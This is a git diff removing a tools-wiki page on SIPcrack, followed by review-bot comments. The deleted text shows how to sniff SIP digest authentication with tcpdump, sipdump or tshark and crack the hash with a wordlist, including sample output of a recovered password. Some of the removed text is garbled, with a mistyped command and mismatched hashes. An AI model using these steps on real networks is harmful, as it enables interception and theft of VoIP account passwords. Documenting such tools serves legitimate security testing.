diff --git a/password/index.md b/password/index.md index 2052417..0f1f870 100644 --- a/password/index.md +++ b/password/index.md @@ -30,7 +30,7 @@ Offline Attacks * [rcracki_mt](../tools/rcracki_mt.md) * [rsmangler](../tools/rsmangler.md) * [samdump2](../tools/samdump2.md) - * [sipcrack](../tools/sipcrack.md) + * [sipcrack](../tools/_template.md) * [sucrack](../tools/_template.md) * [truecrack](../tools/_template.md) diff --git a/tools/sipcrack.md b/tools/sipcrack.md deleted file mode 100644 index 2d92054..0000000 --- a/tools/sipcrack.md +++ /dev/null 
@@ -1,134 +0,0 @@ -# sipcrack - -Notes -------- -SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol. - -The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts. - -SIPcrack contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. sipdump dumps SIP digest authentications. If a login is found, the sniffed login is written to the dump file. See 'sipdump -h' for options. - -sipcrack bruteforces the user's password with the dump file generated by sipdump. If a password is found, the sniffed and cracked login will be updated in the dump file. See 'sipcrack -h' for options. - - -Help Text -------- -``` -SIPcrack 0.2 ( MaJoMu | www.codito.de ) ----------------------------------------- - -Usage: sipcrack [OPTIONS] [ -s | -w ] - - = file containing logins sniffed by SIPdump - - Options: - -s = use stdin for passwords - -w wordlist = file containing all passwords to try - -p num = print cracking process every n passwords (for -w) - (ATTENTION: slows down heavily) - -* Either -w or -s has to be given -``` - -Example Usage -------- -Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. - -Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated. - - -Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP) - -*Capturing the traffic* - -Let's capture the traffic using tcpdump: - -``` -$ tcpdump -s0 -w sip.pcap tcp or udp -``` - -*Isolating the login* - -sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file. 
- -``` -$ cd ~/src/SIPcrack-0.3pre/ -$ ./sipdump -p ~/tmp/sip.pcap logins.dump - -SIPdump 0.3pre ( MaJoMu | www.codito.de ) ---------------------------------------- - -* Using pcap file '../../tmp/sip.pcap' for sniffing -* Starting to sniff with packet filter 'tcp or udp' - -* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158') - -* Exiting, sniffed 1 logins -$ cat logins.dump -192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062 -"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383 -``` - -As you can see from the string above, the login appears in clear, and the password as a MD5 hash. - -Notice that we could also have used tshark to obtain the same result: - -``` -$ tshark -r sip.pcap -Tfields -e sip.auth | grep username -Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", -nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\", -response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5, -opaque=\"04cc3f555880bdf\"\x0d\x0a -Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", -nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\", -response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5, -opaque=\"04cd38e646e760\"\x0d\x0a -``` - -*Cracking the password* - -sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password. - -``` -$ car ~/exploits/dictionaries/test.txt -azerty -elephant -test -password -admin -password01 -Password01 -507ZEy@l -oops -oopsoops -cat -dog7 -monster - -$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump - -SIPcrack 0.3pre ( MaJoMu | www.codito.de ) ----------------------------------------- - -* Found Accounts: - -Num Server Client User Hash|Password - -1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383 - -* Select which entry to crack (1 - 1): 1 - -* Generating static MD5 hash... 
04cd38e646e760da129f99fa734ac1e4 -* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') -* Loaded wordlist: '~/exploits/dictionaries/test.txt' -* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') -* Tried 10 passwords in 0 seconds - -* Found password: '507ZEy@l' -* Updating dump file 'logins.dump'... done -``` - - -Links -------- -* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)
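Review bot: In the password/index.md hunk, the sipcrack entry is repointed to `../tools/_template.md` in the same patch that deletes tools/sipcrack.md, so the index still lists sipcrack but the link now lands on the placeholder template. If the tool page is being dropped on purpose, state the reason in the commit message, since the entry now looks like the undocumented sucrack and truecrack entries below it. If the deletion is not intended, keep the link at `../tools/sipcrack.md` and drop the file removal from this patch.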
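Review bot: The tools/sipcrack.md hunk removes all 134 lines, including the Notes and Help Text sections, and nothing in this patch replaces them. If the content is to be moved or re-added, three things in the removed text need fixing first. The usage line `Usage: sipcrack [OPTIONS] [ -s | -w ]` and the line `= file containing logins sniffed by SIPdump` appear to have lost the dump-file argument name. The wordlist listing runs `$ car` where `cat` is meant. The sample output shows the response as dc59495f8eb78a605a2ad5d57835a383 in the accounts table but dc59445f8ef78a615a2ad4d57835a383 in logins.dump and in the bruteforce lines.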